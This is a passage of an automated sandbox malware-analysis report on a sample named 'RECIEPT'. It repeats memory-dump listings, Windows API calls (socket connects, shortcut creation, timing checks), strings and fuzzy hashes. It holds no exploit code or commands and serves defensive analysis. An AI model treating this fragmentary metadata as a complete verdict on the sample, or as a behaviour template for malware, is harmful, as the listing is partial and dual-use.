                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Window$EnableMessageSend$LongShow
                                        • String ID:
                                        • API String ID: 142311417-0
                                        • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                        • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                        • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                        • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                        • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                        • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                        • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 00445879
                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                        • _wcslen.LIBCMT ref: 004458FB
                                        • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                        • String ID:
                                        • API String ID: 3087257052-0
                                        • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                        • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                        • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                        • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                        APIs
                                          • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                        • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                        • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                        • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                        • String ID:
                                        • API String ID: 245547762-0
                                        • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                        • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                        • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                        • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                        APIs
                                        • DeleteObject.GDI32(00000000), ref: 004471D8
                                        • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                        • SelectObject.GDI32(?,00000000), ref: 00447228
                                        • BeginPath.GDI32(?), ref: 0044723D
                                        • SelectObject.GDI32(?,00000000), ref: 00447266
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Object$Select$BeginCreateDeletePath
                                        • String ID:
                                        • API String ID: 2338827641-0
                                        • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                        • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                        • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                        • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                        APIs
                                        • Sleep.KERNEL32(00000000), ref: 00434598
                                        • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                        • Sleep.KERNEL32(00000000), ref: 004345D4
                                        • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: CounterPerformanceQuerySleep
                                        • String ID:
                                        • API String ID: 2875609808-0
                                        • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                        • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                        • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                        • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                        • MessageBeep.USER32(00000000), ref: 00460C46
                                        • KillTimer.USER32(?,0000040A), ref: 00460C68
                                        • EndDialog.USER32(?,00000001), ref: 00460C83
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                        • String ID:
                                        • API String ID: 3741023627-0
                                        • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                        • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                        • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                        • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Destroy$DeleteObjectWindow$Icon
                                        • String ID:
                                        • API String ID: 4023252218-0
                                        • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                        • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                        • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                        • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                        APIs
                                        • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                        • DeleteObject.GDI32(?), ref: 00455736
                                        • DeleteObject.GDI32(?), ref: 00455744
                                        • DestroyIcon.USER32(?), ref: 00455752
                                        • DestroyWindow.USER32(?), ref: 00455760
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: DeleteDestroyObject$IconMessageSendWindow
                                        • String ID:
                                        • API String ID: 1489400265-0
                                        • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                        • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                        • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                        • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                        APIs
                                          • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                        • DestroyWindow.USER32(?), ref: 00455728
                                        • DeleteObject.GDI32(?), ref: 00455736
                                        • DeleteObject.GDI32(?), ref: 00455744
                                        • DestroyIcon.USER32(?), ref: 00455752
                                        • DestroyWindow.USER32(?), ref: 00455760
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                        • String ID:
                                        • API String ID: 1042038666-0
                                        • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                        • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                        • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                        • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                        APIs
                                        • __getptd.LIBCMT ref: 0041780F
                                          • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                          • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                        • __getptd.LIBCMT ref: 00417826
                                        • __amsg_exit.LIBCMT ref: 00417834
                                        • __lock.LIBCMT ref: 00417844
                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                        • String ID:
                                        • API String ID: 938513278-0
                                        • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                        • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                        • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                        • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                        APIs
                                          • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                        • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                        • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                        • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                        • ExitThread.KERNEL32 ref: 004151ED
                                        • __freefls@4.LIBCMT ref: 00415209
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                        • String ID:
                                        • API String ID: 4247068974-0
                                        • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                        • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                        • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                        • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: )$U$\
                                        • API String ID: 0-3705770531
                                        • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                        • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                        • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                        • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                        APIs
                                          • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                        • CoInitialize.OLE32(00000000), ref: 0046E505
                                        • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                        • CoUninitialize.OLE32 ref: 0046E53D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                        • String ID: .lnk
                                        • API String ID: 886957087-24824748
                                        • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                        • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                        • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                        • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID: \
                                        • API String ID: 4104443479-2967466578
                                        • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                        • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                        • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                        • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID: \
                                        • API String ID: 4104443479-2967466578
                                        • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                        • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                        • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                        • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
